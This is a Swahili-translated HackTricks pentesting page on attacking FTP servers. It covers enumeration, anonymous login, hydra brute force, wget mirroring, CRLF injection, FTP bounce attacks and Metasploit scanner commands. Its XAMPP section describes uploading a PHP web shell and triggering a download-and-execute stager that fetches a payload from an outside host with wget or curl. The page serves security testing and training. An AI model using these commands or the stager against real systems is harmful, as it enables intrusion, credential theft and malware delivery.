21 - Pentesting FTP

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

File Transfer Protocol (FTP) hutumika kama itifaki ya kawaida ya kuhamisha faili kwenye mtandao wa kompyuta kati ya server na client.
Ni itifaki ya plain-text ambayo inatumia kama new line character 0x0d 0x0a, hivyo wakati mwingine unahitaji kuungana kwa kutumia telnet au nc -C.

Bandari ya chaguo-msingi: 21

PORT   STATE SERVICE
21/tcp open  ftp

Muunganisho Active & Passive

Katika Active FTP FTP client kwanza huanzisha control connection kutoka port yake N hadi FTP Server’s command port – port 21. Kisha client hunsikiliza kwenye port N+1 na inatuma port N+1 kwa FTP Server. FTP Server kisha huanzisha data connection, kutoka port yake M hadi port N+1 ya FTP Client.

Lakini, ikiwa FTP Client ana firewall iliyowekwa inayodhibiti incoming data connections kutoka nje, basi Active FTP inaweza kuwa tatizo. Na, suluhisho linalowezekana kwa hilo ni Passive FTP.

Katika Passive FTP, the client huanzisha the control connection kutoka port yake N hadi port 21 ya FTP Server. Baada ya hapo, the client inatoa amri ya passv comand. The server kisha inamtumia the client moja ya namba ya port zake M. Na the client huanzisha the data connection kutoka port yake P hadi port M ya FTP Server.

Source: https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/

Kukagua Connection

Amri za FTP debug na trace zinaweza kutumika kuona jinsi mawasiliano yanavyofanyika.

Enumeration

nc -vn <IP> 21
openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any

Unganisha kwenye FTP kwa kutumia starttls

lftp
lftp :~> set ftp:ssl-force true
lftp :~> set ssl:verify-certificate no
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> login
Usage: login <user|URL> [<pass>]
lftp 10.10.10.208:~> login username Password

Unauth enum

Kwa kutumia nmap

sudo nmap -sV -p21 -sC -A 10.10.10.10

Unaweza kutumia amri HELP na FEAT kupata taarifa fulani kuhusu FTP server:

HELP
214-The following commands are recognized (* =>'s unimplemented):
214-CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV
214-EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD
214-XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
214-NOOP    FEAT    OPTS    AUTH    CCC*    CONF*   ENC*    MIC*
214-PBSZ    PROT    TYPE    STRU    MODE    RETR    STOR    STOU
214-APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST
214-NLST    STAT    SITE    MLSD    MLST
214 Direct comments to root@drei.work

FEAT
211-Features:
PROT
CCC
PBSZ
AUTH TLS
MFF modify;UNIX.group;UNIX.mode;
REST STREAM
MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;
UTF8
EPRT
EPSV
LANG en-US
MDTM
SSCN
TVFS
MFMT
SIZE
211 End

STAT
#Info about the FTP server (version, configs, status...)

Kuingia bila kujulikana

anonymous : anonymous
_anonymous :
_ftp : ftp

ftp <IP>
>anonymous
>anonymous
>ls -a # List all files (even hidden) (yes, they could be hidden)
>binary #Set transmission to binary instead of ascii
>ascii #Set transmission to ascii instead of binary
>bye #exit

Brute force

Hapa unaweza kupata orodha nzuri ya default ftp credentials: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt

Otomatiki

Anon login and bounce FTP checks zinatendwa kwa chaguo-msingi na nmap kwa chaguo -sC au:

nmap --script ftp-* -p 21 <ip>

Muunganisho wa kivinjari

Unaweza kuungana na seva ya FTP kupitia kivinjari (kama Firefox) kwa kutumia URL ifuatayo:

ftp://anonymous:anonymous@10.10.10.98

Tambua kuwa ikiwa web application inatuma data inayodhibitiwa na mtumiaji directly to a FTP server, unaweza kutuma double URL encode %0d%0a (kwa double URL encode hii ni %250d%250a) bytes na kusababisha FTP server perform arbitrary actions. Moja ya vitendo vya hiari vinavyowezekana ni kupakua yaliyomo kutoka kwenye server inayodhibitiwa na mtumiaji, kufanya port scanning au kujaribu kuzungumza na huduma nyingine zenye maandishi wazi (kama http).

Pakua faili zote kutoka FTP

wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

Ikiwa user/password yako ina herufi maalum, amri ifuatayo inaweza kutumika:

wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/

Root ya FTP imewekwa kwenye webroot (XAMPP)

  • XAMPP/ProFTPD mara nyingi huweka root ya FTP kwenye /opt/lampp/htdocs, hivyo credentials dhaifu za akaunti za huduma kama daemon au nobody zinaweza kukuruhusu upload a PHP web shell directly into the served webroot.
  • Baada ya upload, chochea architecture-aware download/exec stager kupitia shell, kwa mfano: webshell.php?dmc=(wget -qO - http://<compromised_host_ip>/.x/?x=x86 || curl http://<compromised_host_ip>/.x/?x=x86), ambayo inachukua payload iliyothibitishwa kwa checksum, kuihifadhi (kwa mfano, init_start), kuweka chmod +x, na kuitekeleza.
  • Ikiwa directory ya sasa haiandikiki/haitekelezeki, stager itarudi /tmp, hivyo jaribu web paths na ruhusa za filesystem baada ya upload.

Baadhi ya amri za FTP

  • USER username
  • PASS password
  • HELP Seva inaonyesha ni amri gani zinazoungwa mkono
  • PORT 127,0,0,1,0,80 Hii itaonyesha seva ya FTP kuanzisha muunganisho na IP 127.0.0.1 kwenye port 80 (unahitaji kuweka kipengele cha tano kuwa β€œ0” na cha sita kuwa nambari ya port kwa decimal au kutumia cha tano na cha sita kuelezea port kwa hex).
  • EPRT |2|127.0.0.1|80| Hii itaonyesha seva ya FTP kuanzisha muunganisho wa TCP (ikiwaonyeshwa na β€œ2”) na IP 127.0.0.1 kwenye port 80. Amri hii inaunga mkono IPv6.
  • LIST Hii itatuma orodha ya faili katika folda ya sasa
  • LIST -R Orodha kwa urudufu (ikiwa seva inaruhusu)
  • APPE /path/something.txt Hii itaonyesha FTP kuhifadhi data inayopokelewa kutoka kwa muunganisho wa passive au kutoka kwa muunganisho wa PORT/EPRT kwenye faili. Ikiwa jina la faili lipo, itaongeza data.
  • STOR /path/something.txt Kama APPE lakini itatafuta kuandika upya faili
  • STOU /path/something.txt Kama APPE, lakini kama inapatikana, haitafanya chochote.
  • RETR /path/to/file Muunganisho wa passive au port lazima uanzishwe. Kisha, seva ya FTP itatuma faili iliyoainishwa kupitia muunganisho huo
  • REST 6 Hii itaonyesha seva kwamba mara inayofuata itatumia RETR inapaswa kuanza kwenye bait ya sita.
  • TYPE i Weka uhamisho kuwa binary
  • PASV Hii itafungua muunganisho wa passive na itaonyesha kwa mtumiaji wapi anaweza kuunganishwa
  • PUT /tmp/file.txt Pakia faili iliyoonyeshwa kwenye FTP

FTPBounce attack

Seva kadhaa za FTP zinaruhusu amri PORT. Amri hii inaweza kutumika kuelezea seva kuwa unataka kuunganishwa na seva nyingine ya FTP kwenye port fulani. Kisha, unaweza kutumia hii kuchambua ni port gani za mwenyeji zilizo wazi kupitia seva ya FTP.

Learn here how to abuse a FTP server to scan ports.

Unaweza pia kuutumia vibaya utendaji huu kumfanya seva ya FTP kuingiliana na protokoli nyingine. Unaweza kupakia faili iliyo na ombi la HTTP na kuifanya seva ya FTP iliyo dhaifu iimtume kwa seva yoyote ya HTTP (labda kuongeza mtumiaji admin mpya?) au hata kupakia ombi la FTP na kuifanya seva ya FTP inayoweza kushambuliwa kupakua faili kutoka kwa seva nyingine ya FTP.
Nadharia ni rahisi:

  1. Pakia ombi (ndani ya faili ya maandishi) kwenye seva dhaifu. Kumbuka kwamba ikiwa unataka kuzungumza na seva nyingine ya HTTP au FTP unahitaji kubadilisha mistari na 0x0d 0x0a
  2. Tumia REST X ili kuepuka kutuma characters usiotaka kutuma (labda ili kupakia ombi ndani ya faili ulihitaji kuweka header ya picha mwanzoni)
  3. Tumia PORT kuungana na seva na huduma yoyote
  4. Tumia RETR kutuma ombi lililohifadhiwa kwa seva.

Ina uwezekano mkubwa kwamba hili litatupa kosa kama Socket not writable kwa sababu muunganisho hauhudumu kwa muda wa kutosha kutuma data kwa RETR. Mapendekezo ya kujaribu kuepuka hilo ni:

  • Ikiwa unatuma ombi la HTTP, weka ombi lile mfululizo hadi angalau ~0.5MB. Kama hii:

  • Jaribu kujaza ombi na data β€œjunk” zinazohusiana na protocol (ukizungumza na FTP labda amri za junk au kurudia maagizo ya RETR ili kupata faili)
  • Au jaza ombi kwa vingi vya characters za null au vingine (kugawanywa kwenye mistari au la)

Anyway, here you have an old example about how to abuse this to make a FTP server download a file from a different FTP server.

Udhaifu wa FileZilla Server

FileZilla kawaida binds kwa huduma ya Administrative ya FileZilla-Server (port 14147). Ikiwa unaweza kuunda tunnel kutoka mashine yako kufikia port hii, unaweza kuunganishwa nayo ukitumia blank password na kuunda user mpya kwa huduma ya FTP.

Faili za config

ftpusers
ftp.conf
proftpd.conf
vsftpd.conf

Post-Exploitation

Usanidi wa chaguo-msingi wa vsFTPd unapatikana katika /etc/vsftpd.conf. Hapa, unaweza kukutana na mipangilio hatari:

  • anonymous_enable=YES
  • anon_upload_enable=YES
  • anon_mkdir_write_enable=YES
  • anon_root=/home/username/ftp - Directory kwa watumiaji wasiojitambulisha.
  • chown_uploads=YES - Badilisha umiliki wa faili zilizopakiwa na watumiaji wasiojitambulisha
  • chown_username=username - Mtumiaji anayepangiwa umiliki wa faili zilizopakiwa na watumiaji wasiojitambulisha
  • local_enable=YES - Ruhusu watumiaji wa ndani kuingia
  • no_anon_password=YES - Usimuulize watumiaji wasiojitambulisha nywila
  • write_enable=YES - Ruhusu amri: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, na SITE

Shodan

  • ftp
  • port:21

HackTricks Amri za Kiotomatiki

Protocol_Name: FTP    #Protocol Abbreviation if there is one.
Port_Number:  21     #Comma separated if there is more than one.
Protocol_Description: File Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for FTP
Note: |
Anonymous Login
-bi     <<< so that your put is done via binary

wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'
^^to download all dirs and files

wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
if PASV transfer is disabled

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ftp/index.html

Entry_2:
Name: Banner Grab
Description: Grab FTP Banner via telnet
Command: telnet -n {IP} 21

Entry_3:
Name: Cert Grab
Description: Grab FTP Certificate if existing
Command: openssl s_client -connect {IP}:21 -starttls ftp

Entry_4:
Name: nmap ftp
Description: Anon login and bounce FTP checks are performed
Command: nmap --script ftp-* -p 21 {IP}

Entry_5:
Name: Browser Connection
Description: Connect with Browser
Note: ftp://anonymous:anonymous@{IP}

Entry_6:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp

Entry_7:
Name: consolesless mfs enumeration ftp
Description: FTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' &&  msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks